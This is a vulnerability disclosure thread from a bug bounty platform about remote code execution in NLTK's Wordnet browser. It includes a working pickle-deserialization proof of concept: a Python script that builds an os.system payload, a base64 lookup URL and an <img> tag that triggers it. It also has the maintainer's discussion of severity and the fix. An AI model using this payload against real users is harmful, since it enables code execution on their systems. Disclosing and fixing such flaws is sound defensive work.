RCE in Wordnet Browser in nltk/nltk

Valid

Reported on

Dec 29th 2022


Description

A user who visits a malicious link with wordnet browser open will execute code on system

Proof of Concept

Visit

http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu

The base64 is created from

import pickle
import sys
import base64

DEFAULT_COMMAND = "touch /tmp/PWNED"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print(base64.b64encode(pickle.dumps(PickleRce())))

After visiting link will create /tmp/PWNED on system.

ls /tmp

PWNED

This because nltk is unsafely using pickle.loads.

Impact

RCE by inducing user to visit a link.

Occurrences

nltk is unsafely using pickle.loads here

We are processing your report and will contact the nltk team within 24 hours. 11 days ago
haxatron
11 days ago

Researcher


Wordnet browser can be started by:

nltk.app.wordnet_app.app()
haxatron
11 days ago

Researcher


This vulnerability is concerning as a victim only needs to load a malicious img tag on their computer whilst their wordnet browser opened to execute malicious code.

In the previous report, I note that it is mentioned that the maintainer has never heard anyone using it but this Github issue thread https://github.com/nltk/nltk/issues/3002 proves otherwise and that means there are people still using wordnet browser which are vulnerable to RCE

haxatron
11 days ago

Researcher


Some guidance on how to fix this: https://docs.python.org/3.7/library/pickle.html#pickle.Unpickler.find_class

haxatron
11 days ago

Researcher


And https://docs.python.org/3.7/library/pickle.html#pickle-restrict

Tom Aarsen gave praise 11 days ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
haxatron
11 days ago

Researcher


Just my 2 cents, I don't think that this should be low. I agree that the severity for the previous report https://huntr.dev/bounties/861a8d11-0fe9-4c2f-9112-af3a9559fa87/ should be set to low as the XSS is not really useful for an attacker (as there are no cookies for the application). But this is involving an RCE which can be triggered by just visiting any page online with a malicious <img> tag.

I think https://github.com/nltk/nltk/issues/3002 is evidence enough that people are indeed still using the Wordnet browser today. And, these people who are still using the wordnet browser should be concerned about this issue and upgrade their browser to prevent other people from executing malicious code on their systems. That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers. I would lean towards this being High due to the possible RCE impact (at minimum) with a big disclaimer that this only affects users of the wordnet browser.

But again, just my 2 cents.

haxatron
11 days ago

Researcher


^ Correction: I would lean towards this being High (at minimum) due to the possible RCE impact

Tom Aarsen
10 days ago

Maintainer


That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers.

The critical error that I was referring to was the lack of parentheses in the line shown in https://github.com/nltk/nltk/issues/3002. This critical error would prevent the wordnet browser from working in normal circumstances, and would be detected by any user, not just concerned researchers like yourself. I stand by my belief that the wordnet browser is rarely used.

However, I'm not unreasonable. I am open to a discussion on what the severity of this report ought to be, and I recognize that there are differences between this report and the former. In particular:

  1. This vulnerability is much more severe.
  2. This report has the benefit of a compound-effect: I'm more included to notify users now that there have been two vulnerabilities in the wordnet browser.

I'm not very well aware of the img tag attack, could you elaborate on that?

We have contacted a member of the nltk team and are waiting to hear back 10 days ago
haxatron
10 days ago

Researcher


I wasn't aware of that https://github.com/nltk/nltk/issues/3002 fixed quite a major bug. Apologies for that. In that case, I'd agree with you that the app is rarely used.

I'm not very well aware of the img tag attack, could you elaborate on that?

What I meant is that someone would only need to come across this HTML (in another tab of course) with the Wordnet browser opened in order for RCE to occur:

<img src="http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu">
haxatron
10 days ago

Researcher


In normal circumstances, I would think that is a critical/high vulnerability, given that the huntr's scope covers the entire repository and this is a documented API (just not widely used). But as you've mentioned, this module may be rarely used.

I do think there is a possibility of future impact, where users might stumble upon wordnet_app and start to use it, as mentioned in the Github issue. Taking this into account, I think medium would be fine for this vulnerability. Do you agree?

haxatron modified the report
10 days ago
haxatron
10 days ago

Researcher


Alternatively, we can also go with High and point out that only the rarely used wordnet app is affected as @psmoros pointed out in the other thread.

@psmoros it may be better to provide maintainers with the ability to set an "environment" score which reflects how many users would be affected by usage of an API and adjust the score based on that -- sort of like what Hackerone does

Tom Aarsen modified the Severity from Medium (5) to Low (3.9) 7 days ago
Tom Aarsen modified the Severity from Low (3.9) to Medium (5) 7 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Aarsen validated this vulnerability 7 days ago

I've discussed it with the team, and we have decided to remove the Wordnet Browser from NLTK (and move it to https://github.com/nltk/nltk_contrib/). As a result, I don't deem it necessary to push out a CVE notifying users to update to a new version, as there will only be one version with the fixes (3.8.1) before we remove the functionality altogether. After some consideration I've decided to leave the severity at the level that you suggested, and I'll leave the final judgement for the CVE to Huntr.

I apologize for the consequences for your credibility and disclosure bounty from the reduction in severity. I appreciate the time and effort that you put into this report.

cc: @admin

haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Aarsen marked this as fixed in 3.8.1 with commit 50be0b 7 days ago
Tom Aarsen has been awarded the fix bounty
This vulnerability will not receive a CVE
Tom Aarsen published this vulnerability 7 days ago
wordnet_app.py#L697 has been validated
haxatron
7 days ago

Researcher


No worries at all! I am satisfied with your judgement! :)

to join this conversation